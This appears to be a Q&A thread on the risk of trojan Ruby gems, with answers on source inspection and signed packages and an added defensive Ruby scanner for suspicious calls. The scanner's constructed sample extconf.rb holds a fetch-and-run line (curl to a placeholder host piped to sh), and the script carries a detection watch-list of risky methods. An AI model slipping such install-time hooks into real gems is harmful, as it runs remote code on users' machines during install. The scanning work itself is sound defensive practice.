
Is there a risk of a Ruby gem acting like a trojan?


Of course there is. You're installing software on your computer that runs with the privileges of the script/user that calls it. It's probably easier to spot malicious code in pure Ruby than in binary packages. But if you think source inspection is a guaranteed way to spot malicious code, check out the Underhanded C Contest.

That said, if you want to write malware there are more effective delivery systems than Ruby gems. I would not be surprised if the number of actual malicious gems in existence is 0, and thus that the probability that this one is malicious is likewise 0...

See: http://rubygems.org/read/chapter/14#page61


There is a risk of malicious code whenever you import unknown logic into an application. The risks are only as deep as the data to which that application has access. Like how Java applets are sandboxed.

Get signed packages you trust, or look at the source.
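As an added example, not code from any of the answers above: the first answer notes that pure-Ruby source is easier to inspect than a binary, and the second suggests looking at the source. The script below is one way to do that at scale: it tokenises each file of a gem with the standard-library `Ripper` lexer (so matches in comments are ignored) and flags shell execution, `eval`-style calls and embedded URLs, ranking `extconf.rb` hits first because RubyGems runs that file during `gem install` for gems with native extensions. The watch-list and the sample gem (a two-file hash, including a constructed `extconf.rb` that shells out to `curl | sh`) are both constructed for this example; `example.invalid` is a reserved placeholder host, not a real site.

```ruby
require 'ripper'

# Method names whose presence in a gem warrants a closer look by a human.
# Constructed watch-list for this example; tune it to your own threat model.
SUSPICIOUS_CALLS = %w[
  system exec spawn eval instance_eval class_eval module_eval
  popen load send public_send define_method
].freeze

# extconf.rb is executed by RubyGems at install time for gems with native
# extensions, so anything flagged there runs before the gem is ever required.
def install_time_file?(path)
  File.basename(path) == 'extconf.rb'
end

# Tokenise one Ruby source file with Ripper (comments become :on_comment
# tokens and are never matched) and return findings as hashes of
# { file:, line:, what:, install_time: }. :on_ident also matches local
# variables that happen to share a name with a watched method, so treat
# the output as a list of places to read, not a verdict.
def scan_source(path, source)
  findings = []
  Ripper.lex(source).each do |(line, _col), type, tok, *_state|
    what =
      case type
      when :on_ident then "call to #{tok}" if SUSPICIOUS_CALLS.include?(tok)
      when :on_backtick then 'backtick / %x shell execution'
      when :on_tstring_content then 'URL inside string literal' if tok.match?(%r{https?://})
      end
    next unless what

    findings << { file: path, line: line, what: what, install_time: install_time_file?(path) }
  end
  findings
end

# Scan every file of a gem (hash of path => source) and put install-time
# findings first, since those execute without the gem ever being required.
def scan_gem(files)
  files.flat_map { |path, src| scan_source(path, src) }
       .sort_by { |f| [f[:install_time] ? 0 : 1, f[:file], f[:line]] }
end

# Constructed sample gem: an ordinary library file plus an install-time hook
# that would fetch and run a script during `gem install`.
SAMPLE_GEM = {
  'lib/hello.rb' => <<~'RUBY',
    # Ordinary library code: nothing to flag here.
    module Hello
      def self.greet(name)
        "Hello, #{name}"
      end
    end
  RUBY
  'ext/hello/extconf.rb' => <<~'RUBY',
    require 'mkmf'
    # Constructed install-time hook: fetches and runs a script during `gem install`.
    system("curl -s http://example.invalid/setup.sh | sh")
    create_makefile('hello')
  RUBY
}.freeze

if $PROGRAM_NAME == __FILE__
  scan_gem(SAMPLE_GEM).each do |f|
    tag = f[:install_time] ? 'INSTALL-TIME' : 'runtime'
    puts "#{tag.ljust(12)} #{f[:file]}:#{f[:line]}  #{f[:what]}"
  end
end
```

To run it against a real gem, `gem unpack name.gem` (or `gem fetch` first) and feed the unpacked files in as the path => source hash. For the signed-package side of the same answer, `gem install -P HighSecurity name` makes RubyGems refuse any gem whose signature does not chain to a certificate you have already trusted, which is a stricter check than a signature merely being present.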


If I wanted to get a handle on the likelihood of a malicious gem occurring, I'd look at whether malicious packages have been detected in any language (e.g. Python eggs, or Perl's CPAN), how likely it is that a malicious package has been produced without anyone noticing, and whether Ruby is at any greater risk than other languages.

I might see if I could generate a web of trust - even if I don't know the gem author, do I know someone who does?

I might also look at whether package managers such as Debian examine whether packages are malicious, and if so, whether they've examined the gem you want to use.